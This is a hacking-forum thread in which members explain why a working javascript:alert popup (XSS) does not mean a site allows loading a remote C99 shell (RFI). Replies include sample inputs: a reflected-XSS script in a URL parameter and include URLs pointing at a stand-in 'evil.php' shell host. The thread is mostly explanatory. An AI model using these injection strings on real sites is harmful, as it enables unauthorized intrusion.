| Author |
Does javascript alert always mean |
chronicburst
Member
Posts: 466
Location: /root/
Joined: 03.01.08
Rank: Elite |
|
Hey, I was just curious to know if when javascblockedript:alert is used and works on a site. Does this always mean that you can run a shell through the site or not all the time?
|
  
|
| Author |
RE: Does javascript alert always mean |
spyware
Member
Posts: 4190
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 90
|
|
It means you don't understand a thing about the subject you are studying.
"The chowner of property." - Zeph Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
|
| Author |
RE: Does javascript alert always mean |
chronicburst
Member
Posts: 466
Location: /root/
Joined: 03.01.08
Rank: Elite |
|
Thats what I figured.
|
|
|
| Author |
RE: Does javascript alert always mean |
ShapeShifters
Member
Posts: 393
Location: I'm lost...
Joined: 21.12.07
Rank: God |
|
yeah man learn a bit about javascblockedript injections. things will make more sense then.
to answer your question directly, no.
javascblockedript injections have nothing to do with running a shell on a site.
 |
|
|
| Author |
RE: Does javascript alert always mean |
chronicburst
Member
Posts: 466
Location: /root/
Joined: 03.01.08
Rank: Elite |
|
No man, sorry. Thats not what I mean. I was saying would the fact that javascblockedript:alert works. Does this mean I could inject a shell such as C99 through a javascblockedript snippet which runs the remote page locally.
Like ?page=www.site.com/shell
|
|
|
| Author |
RE: Does javascript alert always mean |
ShapeShifters
Member
Posts: 393
Location: I'm lost...
Joined: 21.12.07
Rank: God |
|
Nope. Think about it logically. You can javascblockedript:alert any page (like for example this hbh page) so it wouldn't make much sense if you could then open up a shell on hbh because it is obviously a pretty secure website. If it was that easy there'd be nothing to taking over any site.
|
|
|
| Author |
RE: Does javascript alert always mean |
yours31f
Second to one
Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank: Satan |
|
right all your doing is saying "make a popup"
Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.
|
|
| Author |
RE: Does javascript alert always mean |
GTADarkDude
Member
Posts: 142
Location: The Netherlands
Joined: 23.02.08
Rank: God |
|
I think that's not what he means either. I think that what he asks is when a page is vulnerable to XSS, which you can test with a Javascblockedript alert, whether you can also include a C99 shell. Am I right?
... |
|
| Author |
RE: Does javascript alert always mean |
Feralas
Member
Posts: 301
Location: 127.0.0.1
Joined: 25.02.08
Rank: HBH Guru |
|
index.php?id=<scblockedript>alert("abc");</scblockedript>
While the above may work, the bellow may not, and vice versa.
index.php?id=http://www.mysite.com/evil.php
/-- Ipsa Scientia Potestas Est --\
\-- Knowledge itself is power. --/
To fear death is to limit life.
|
|
|
| Author |
RE: Does javascript alert always mean |
Uber0n
Member
Posts: 1963
Location: Sweden
Joined: 13.06.06
Rank: God |
|
This thread made me confused, but I suppose the answer you're looking for is something like this:
"Just because you can put javascblockedript injections in the URL bar no matter what site you're visiting, it doesn't mean the site is vulnerable to RFI. Javascblockedript is client-side scblockedripts and PHP is server-side."
http://uber0n.webs.com/ |
|
|
Main:
